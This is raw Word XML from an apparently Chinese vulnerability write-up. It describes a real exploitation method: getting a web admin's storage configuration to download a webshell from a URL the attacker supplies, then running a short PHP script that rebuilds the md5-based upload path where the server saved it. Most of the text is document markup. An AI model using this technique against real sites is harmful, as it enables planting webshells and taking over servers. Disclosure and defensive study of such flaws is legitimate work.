          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ph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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A54F64">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D956327" w14:textId="1AB0B029" w:rsidR="007142B9" w:rsidRPr="00A54F64" w:rsidRDefault="00A54F64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也就是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54F64">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54F64">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>下载路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69105D06" w14:textId="27099261" w:rsidR="006736AA" w:rsidRDefault="006736AA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点击保存</w:t>
      </w:r>
      <w:r w:rsidR="007813BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E30B4B" w14:textId="77777777" w:rsidR="003A5EDD" w:rsidRDefault="00757EFC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保存完毕需计算一下下载到服务器上的路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25347CE0" w14:textId="17E6C4D0" w:rsidR="00757EFC" w:rsidRDefault="00D9297B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92CE4" wp14:editId="5BE6F982">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>266700</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>396240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4998720" cy="3253740"/>
                <wp:effectExtent l="0" t="0" r="17780" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="62260460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25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5B417" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t>function name(string $url, string $ext = '', string $pre = '', string $fun = 'md5'): string</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="14EA8F27" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t>{</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="058298DF" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t xml:space="preserve">    [$hah, $ext] = [$fun($url), trim($ext ?: pathinfo($url, 4), '.\\/')];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7E2F6459" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t xml:space="preserve">    $attr = [trim($pre, '.\\/'), substr($hah, 0, 2), substr($hah, 2, 30)];</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B299327" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t xml:space="preserve">    return trim(join('/', $attr), '/') . '.' . strtolower($ext ?: 'tmp');</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="04FF43DF" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t>}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4FDB6980" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B"/>
                          <w:p w14:paraId="2F6B22C7" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t>$url = "你填写的webshell下载路径";</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C21E683" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B"/>
                          <w:p w14:paraId="3FA080C0" w14:textId="7B950E98" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                            <w:r>
                              <w:t>echo '/upload/'.name($url, '', 'down/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92CE4" id="文本框 1" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:21pt;margin-top:31.2pt;width:393.6pt;height:25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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0A55B417" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t>function name(string $url, string $ext = '', string $pre = '', string $fun = 'md5'): string</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="14EA8F27" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t>{</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="058298DF" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t xml:space="preserve">    [$hah, $ext] = [$fun($url), trim($ext ?: pathinfo($url, 4), '.\\/')];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7E2F6459" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t xml:space="preserve">    $attr = [trim($pre, '.\\/'), substr($hah, 0, 2), substr($hah, 2, 30)];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B299327" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t xml:space="preserve">    return trim(join('/', $attr), '/') . '.' . strtolower($ext ?: 'tmp');</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="04FF43DF" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4FDB6980" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B"/>
                    <w:p w14:paraId="2F6B22C7" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t>$url = "你填写的webshell下载路径";</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3C21E683" w14:textId="77777777" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B"/>
                    <w:p w14:paraId="3FA080C0" w14:textId="7B950E98" w:rsidR="00D9297B" w:rsidRDefault="00D9297B" w:rsidP="00D9297B">
                      <w:r>
                        <w:t>echo '/upload/'.name($url, '', 'down/');</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003A5EDD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>脚本如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000658B7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000658B7" w:rsidRPr="000658B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A1C92A" wp14:editId="415292D8">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="156327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702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D98" w14:textId="2BEEADAE" w:rsidR="00BA1D13" w:rsidRDefault="00BA1D13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使用如上计算</w:t>
      </w:r>
      <w:r w:rsidR="00014B75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="00014B75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00014B75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>变量为设置系统参数的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00014B75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56FB11B9" w14:textId="70E8AF82" w:rsidR="0039436E" w:rsidRDefault="0039436E" w:rsidP="006736AA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拼接路径</w:t>
      </w:r>
      <w:r w:rsidR="0075478F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7655D0C2" w14:textId="12B884BD" w:rsidR="00322503" w:rsidRPr="0058204A" w:rsidRDefault="009867E7" w:rsidP="006736AA">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009867E7">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BC90766" wp14:editId="0F218296">
            <wp:extent cx="5274310" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1937456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6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503" w:rsidRPr="00582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73AE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFC84B8E"/>
    <w:lvl w:ilvl="0" w:tplc="CB0E5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020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F8"/>
    <w:rsid w:val="00014B75"/>
    <w:rsid w:val="0002462D"/>
    <w:rsid w:val="00032360"/>
    <w:rsid w:val="000658B7"/>
    <w:rsid w:val="00066BB8"/>
    <w:rsid w:val="00070E8B"/>
    <w:rsid w:val="000729E3"/>
    <w:rsid w:val="0009260F"/>
    <w:rsid w:val="00093782"/>
    <w:rsid w:val="00113491"/>
    <w:rsid w:val="00114182"/>
    <w:rsid w:val="001159B0"/>
    <w:rsid w:val="00153B8C"/>
    <w:rsid w:val="00160E1C"/>
    <w:rsid w:val="00176E49"/>
    <w:rsid w:val="001A557A"/>
    <w:rsid w:val="001F4C7E"/>
    <w:rsid w:val="00212AC3"/>
    <w:rsid w:val="002452AB"/>
    <w:rsid w:val="002454EE"/>
    <w:rsid w:val="00274DF5"/>
    <w:rsid w:val="00294A90"/>
    <w:rsid w:val="002B19D2"/>
    <w:rsid w:val="002D725C"/>
    <w:rsid w:val="00303367"/>
    <w:rsid w:val="003120E2"/>
    <w:rsid w:val="00322503"/>
    <w:rsid w:val="003330FC"/>
    <w:rsid w:val="0037462D"/>
    <w:rsid w:val="0039436E"/>
    <w:rsid w:val="003A5EDD"/>
    <w:rsid w:val="003A72E1"/>
    <w:rsid w:val="003F16E8"/>
    <w:rsid w:val="00401476"/>
    <w:rsid w:val="004D1045"/>
    <w:rsid w:val="004F3039"/>
    <w:rsid w:val="004F4FB0"/>
    <w:rsid w:val="005063F1"/>
    <w:rsid w:val="0058204A"/>
    <w:rsid w:val="005C5BC0"/>
    <w:rsid w:val="005E4C98"/>
    <w:rsid w:val="005E5548"/>
    <w:rsid w:val="00605DC1"/>
    <w:rsid w:val="0066132A"/>
    <w:rsid w:val="006736AA"/>
    <w:rsid w:val="006C56FE"/>
    <w:rsid w:val="006D387B"/>
    <w:rsid w:val="006F3118"/>
    <w:rsid w:val="007142B9"/>
    <w:rsid w:val="00716D59"/>
    <w:rsid w:val="0075478F"/>
    <w:rsid w:val="0075599E"/>
    <w:rsid w:val="00757EFC"/>
    <w:rsid w:val="007813BC"/>
    <w:rsid w:val="007B015A"/>
    <w:rsid w:val="007B5FFF"/>
    <w:rsid w:val="007F4189"/>
    <w:rsid w:val="008125A6"/>
    <w:rsid w:val="008204E0"/>
    <w:rsid w:val="00830A4D"/>
    <w:rsid w:val="00837112"/>
    <w:rsid w:val="00860BF8"/>
    <w:rsid w:val="00861864"/>
    <w:rsid w:val="00874640"/>
    <w:rsid w:val="00883BED"/>
    <w:rsid w:val="00902F30"/>
    <w:rsid w:val="00907DE8"/>
    <w:rsid w:val="00930C36"/>
    <w:rsid w:val="00941EC1"/>
    <w:rsid w:val="009867E7"/>
    <w:rsid w:val="00A06F5B"/>
    <w:rsid w:val="00A30D32"/>
    <w:rsid w:val="00A35567"/>
    <w:rsid w:val="00A52A27"/>
    <w:rsid w:val="00A54F64"/>
    <w:rsid w:val="00A56619"/>
    <w:rsid w:val="00AA1AF2"/>
    <w:rsid w:val="00AD0053"/>
    <w:rsid w:val="00B21D52"/>
    <w:rsid w:val="00BA1D13"/>
    <w:rsid w:val="00C42D13"/>
    <w:rsid w:val="00C861FC"/>
    <w:rsid w:val="00CD60CD"/>
    <w:rsid w:val="00D51517"/>
    <w:rsid w:val="00D74D0C"/>
    <w:rsid w:val="00D75DA9"/>
    <w:rsid w:val="00D8760D"/>
    <w:rsid w:val="00D9297B"/>
    <w:rsid w:val="00DB6BB3"/>
    <w:rsid w:val="00DD65A8"/>
    <w:rsid w:val="00DF4BBC"/>
    <w:rsid w:val="00E2787C"/>
    <w:rsid w:val="00E53105"/>
    <w:rsid w:val="00E53B19"/>
    <w:rsid w:val="00E75FD4"/>
    <w:rsid w:val="00F07E50"/>
    <w:rsid w:val="00F6385D"/>
    <w:rsid w:val="00F7139B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6CC9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{26EAFE78-D9F0-B04C-B039-DB437370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F5B"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00605DC1"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00605DC1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2452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/admin/config/storage.html?spm=m-1-2-3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localhost/admin/api.upload/fi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t-license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5721E-3F74-574F-8C88-68BB070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dcterms:created xsi:type="dcterms:W3CDTF">2023-11-09T05:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-11T14:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>